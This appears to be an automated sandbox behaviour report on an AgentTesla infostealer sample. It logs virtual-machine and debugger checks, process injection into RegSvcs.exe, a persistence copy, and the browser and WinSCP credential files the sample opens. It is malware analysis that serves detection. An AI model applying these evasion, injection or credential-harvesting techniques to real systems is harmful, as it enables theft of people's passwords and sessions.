Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594328	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 2345			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 7505			Jump to behavior

Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 2828	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 5356	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599757	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598668	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598442	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598311	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597640	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596874	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596184	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596077	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595968	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595778	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595653	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595528	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594328	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: Amcache.hve.5.dr	Binary or memory string: VMware
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr	Binary or memory string: VMware, Inc.
Source: PO54782322024.exe, 00000000.00000002.1905005575.0000017F05F4B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: PO54782322024.exe, 00000000.00000002.1905005575.0000017F05F4B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE
Source: PO54782322024.exe, 00000000.00000002.1905005575.0000017F05F4B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: Amcache.hve.5.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: PO54782322024.exe, 00000000.00000002.1905005575.0000017F05F4B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: PO54782322024.exe, 00000000.00000002.1905005575.0000017F05F4B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: Amcache.hve.5.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: PO54782322024.exe, 00000000.00000002.1905005575.0000017F05F4B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin`
Source: PO54782322024.exe, 00000000.00000002.1905005575.0000017F05F4B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: Amcache.hve.5.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: PO54782322024.exe, 00000000.00000002.1905005575.0000017F05F4B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: PO54782322024.exe, 00000000.00000002.1905005575.0000017F05F4B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: Amcache.hve.5.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.5.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.5.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: PO54782322024.exe, 00000000.00000002.1905005575.0000017F05F4B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: PO54782322024.exe, 00000000.00000002.1905005575.0000017F05F4B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: Amcache.hve.5.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: RegSvcs.exe, 00000002.00000002.4120558709.0000000005BD7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~
Source: Amcache.hve.5.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\PO54782322024.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\PO54782322024.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: PO54782322024.exe, ------------------.cs	Reference to suspicious API methods: GetProcAddress(_05C4_05A2_05F6_0595_05FA_059A_05A3, _05BC_05B4_05F9_05A6_0591_0598_05A2_05F5)
Source: PO54782322024.exe, ------------------.cs	Reference to suspicious API methods: VirtualProtect(procAddress, (UIntPtr)(ulong)_05A6_059F_0590_0594_05EB_059A_05F3_05C1.Length, 64u, out var _05CA_0596_05F3_05BA_05FC_05FB_05CD_0598_0591_05AB_05C0_05A4_05FA)
Source: PO54782322024.exe, ------------------.cs	Reference to suspicious API methods: LoadLibrary(array5[0])

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\PO54782322024.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\PO54782322024.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\PO54782322024.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 42C000	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 42E000	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 85C008	Jump to behavior

Source: C:\Users\user\Desktop\PO54782322024.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"

Jump to behavior

Source: RegSvcs.exe, 00000002.00000002.4116925393.0000000002AB7000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: Program Manager

Source: C:\Users\user\Desktop\PO54782322024.exe	Queries volume information: C:\Users\user\Desktop\PO54782322024.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Queries volume information: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Queries volume information: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\PO54782322024.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.5.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO54782322024.exe.17f15f6db50.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO54782322024.exe.17f15f43b08.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO54782322024.exe.17f15f6db50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4115057036.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1905674318.0000017F15F18000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 00000002.00000002.4116925393.0000000002AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2476, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2476, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
